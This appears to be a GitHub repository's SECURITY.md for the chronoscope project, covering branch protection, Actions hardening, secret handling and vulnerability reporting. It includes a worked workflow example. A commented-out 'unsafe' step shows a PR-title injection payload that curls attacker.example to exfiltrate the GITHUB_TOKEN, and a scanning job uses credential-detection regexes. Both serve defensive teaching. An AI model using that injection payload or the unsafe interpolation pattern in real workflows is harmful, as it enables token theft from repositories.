
Security: BioInfo/chronoscope


.github/SECURITY.md

Security Policy

🔒 Repository Security

This repository is configured for safe public use with the following security measures:

Branch Protection

The main branch is protected with:

  • Required pull request reviews before merging
  • Only repository maintainers can merge PRs
  • External contributors cannot push directly to branches

Access Control

You (Repository Owner) Control:

  • ✅ Pull request approvals and merges
  • ✅ GitHub Actions workflow execution
  • ✅ Repository secrets and configuration
  • ✅ Branch protection rules
  • ✅ Deployment to production

External Contributors Can:

  • ✅ Fork the repository
  • ✅ Submit pull requests from their forks
  • ✅ View public workflow definitions

External Contributors Cannot:

  • ❌ Push to repository branches
  • ❌ Merge pull requests
  • ❌ Access repository secrets
  • ❌ Modify workflow files without approval
  • ❌ Trigger deployments

GitHub Actions Security

All workflows follow these practices:

  • Untrusted event data (pull request titles and bodies, branch names, issue text) is passed to scripts through environment variables, never interpolated directly into run: steps, which is how script injection in workflows occurs
  • Workflows triggered by pull_request from a fork run without repository secrets and with a read-only GITHUB_TOKEN, so secrets are never exposed to external PRs
  • Workflow permissions are limited: read-only by default, with write scopes granted per job only where a step needs them
  • Manually triggered (workflow_dispatch) workflows can only be started by users with write access to the repository

API Keys and Secrets

  • Gemini API keys are supplied by the user and kept in the browser's localStorage; they are never sent to or stored by this repository or its deployment. Note that localStorage is readable by any script running on the page origin, so the XSS checks below are what protect these keys
  • Vercel tokens are stored as GitHub Secrets (encrypted at rest and only available to workflows on trusted events)
  • No secrets are committed to the repository
  • .env files are gitignored

πŸ› Reporting Security Vulnerabilities

If you discover a security vulnerability, please DO NOT open a public issue.

Instead:

  1. Email the maintainer directly with details
  2. Or use GitHub's Private Vulnerability Reporting

Include:

  • Description of the vulnerability
  • Steps to reproduce
  • Potential impact
  • Suggested fix (if any)

We will respond within 48 hours and work with you to resolve the issue.


πŸ” Security Best Practices for Contributors

When Contributing Code

  • ✅ Never commit API keys, tokens, or secrets
  • ✅ Use environment variables for configuration
  • ✅ Validate all user inputs
  • ✅ Follow secure coding practices
  • ✅ Test for XSS and injection vulnerabilities

When Submitting PRs

  • ✅ Review your changes for sensitive data
  • ✅ Ensure .env files are not included
  • ✅ Check for accidentally committed credentials
  • ✅ Review the full history of your branch (git log -p), not just the final diff: a secret removed in a later commit is still present in the earlier one and must be rewritten out before the PR is opened

When Using GitHub Actions

  • ✅ Use environment variables for all inputs
  • ✅ Never interpolate untrusted data in run commands
  • ✅ Follow the GitHub Actions security guide
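The Actions practices above and the pre-submission checks under "When Submitting PRs" (no .env files, no committed credentials) as one worked workflow. This is an added example written for this page, not a workflow from the chronoscope repository; the job names, the "AIza" prefix assumed for Gemini (Google) API keys and the credential regex are assumptions to tune for the project.

```yaml
# Added example: a hardened pull_request workflow. Not a workflow from the
# chronoscope repository; job names, paths and the key pattern are assumptions.
name: pr-checks

on:
  pull_request:            # fork PRs get no secrets and a read-only GITHUB_TOKEN
    branches: [main]

# Read-only by default; grant write scopes per job only where a step needs them.
permissions:
  contents: read

jobs:
  lint-title:
    runs-on: ubuntu-latest
    steps:
      # UNSAFE (shown for contrast, do not use): the ${{ }} expression is
      # expanded by the runner before the shell starts, so a PR title such as
      #   x"; curl https://attacker.example/?t=$GITHUB_TOKEN; echo "
      # becomes part of the script and runs with the job's token.
      # - run: echo "PR title: ${{ github.event.pull_request.title }}"

      # SAFE: pass the untrusted value through an environment variable.
      # The shell receives it as data and never parses it as code.
      - name: Print PR title
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: printf 'PR title: %s\n' "$PR_TITLE"

  secret-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0         # full history so base and head commits are available
      - name: Fail on .env files or key-shaped strings in the PR diff
        env:
          BASE_SHA: ${{ github.event.pull_request.base.sha }}
          HEAD_SHA: ${{ github.event.pull_request.head.sha }}
        run: |
          set -euo pipefail
          # 1. Any file named .env, .env.local, .env.production, ... in the change set.
          #    (Exclude .env.example here if the project deliberately commits one.)
          if git diff --name-only "$BASE_SHA" "$HEAD_SHA" | grep -E '(^|/)\.env(\.|$)'; then
            echo '::error::.env file in changes; it must stay gitignored'
            exit 1
          fi
          # 2. Added lines (not the +++ file header) that look like a Google/Gemini
          #    API key (assumed "AIza" + 35 chars) or an inline token assignment.
          #    The regex is an assumption; tune it for the project's real key formats.
          if git diff "$BASE_SHA" "$HEAD_SHA" | grep -E '^\+' | grep -Ev '^\+\+\+' \
             | grep -En 'AIza[0-9A-Za-z_-]{35}|(api[_-]?key|token|secret)[[:space:]]*[:=][[:space:]]*[A-Za-z0-9_-]{16,}'; then
            echo '::error::possible credential in added lines'
            exit 1
          fi
```

The secret-scan job only ever uses the PR's commits as data passed to git through environment variables; it never reads or executes code from the PR, so it is safe to run on the pull_request event. Keep it on pull_request, not pull_request_target, because the latter does receive repository secrets.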

πŸ›‘οΈ Dependency Security

We monitor dependencies for security vulnerabilities:

  • Dependabot alerts enabled
  • Regular dependency updates
  • Security advisories reviewed

To check and update dependencies (npm audit fix applies only semver-compatible updates; findings it cannot fix automatically must be reviewed by hand):

npm audit
npm audit fix

📋 Security Checklist

Before deploying changes:

  • No secrets in code or commits
  • .env files properly gitignored
  • All dependencies updated and audited
  • User inputs validated and sanitized
  • XSS protection in place
  • HTTPS used for all external APIs
  • GitHub Actions workflows secured

🔄 Security Updates

This security policy is reviewed and updated regularly. Last updated: 2025-11-28


📞 Contact

For security concerns, contact the repository maintainer via GitHub.


βš–οΈ Responsible Disclosure

We appreciate security researchers who responsibly disclose vulnerabilities. We commit to:

  • Acknowledging your report within 48 hours
  • Providing a timeline for fixes
  • Crediting you in release notes (if desired)
  • Keeping you informed throughout the process

Thank you for helping keep The Chronoscope secure! 🔒
